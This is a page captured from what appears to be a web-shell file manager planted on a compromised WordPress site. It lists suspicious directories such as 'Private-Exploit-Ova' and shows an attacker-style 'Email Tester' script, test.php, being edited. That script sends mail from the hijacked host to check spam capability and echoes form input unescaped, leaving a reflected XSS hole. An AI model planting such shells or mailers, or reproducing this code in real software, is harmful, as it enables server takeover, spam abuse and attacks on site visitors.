X7ROOT File Manager
Current Path:
/home/socmnuxr/public_html
home
/
socmnuxr
/
public_html
/
📁
..
📄
.hta
(6.54 KB)
📄
.litespeed_flag
(297 B)
📁
0b2ad
📁
OVA-UNAME2
📁
Private-Exploit-Ova
📁
admin
📄
admin.php
(278 B)
📁
c276f
📁
class
📁
common
📁
css
📄
error_log
(8.79 MB)
📄
google0d9c37662e888516.html
(53 B)
📄
google856504f8ec0fb3e7.html
(53 B)
📁
image
📁
images
📄
index.php0
(11.53 KB)
📁
js
📁
log
📄
options.php
(416 B)
📁
pic
📁
picture
📄
robots.txt
(67 B)
📄
test.php
(737 B)
📄
tt.php
(789 B)
📄
unzip.php
(0 B)
📁
wp-admin
📁
wp-content
📁
wp-includes
📄
wp-load.php
(4.02 KB)
📄
wp-loada.php
(102 B)
📄
wp-loadb.php
(67 B)
Editing: test.php
<?php error_reporting(0); echo '<b>Email Tester [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")"," [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>
Upload File
Create Folder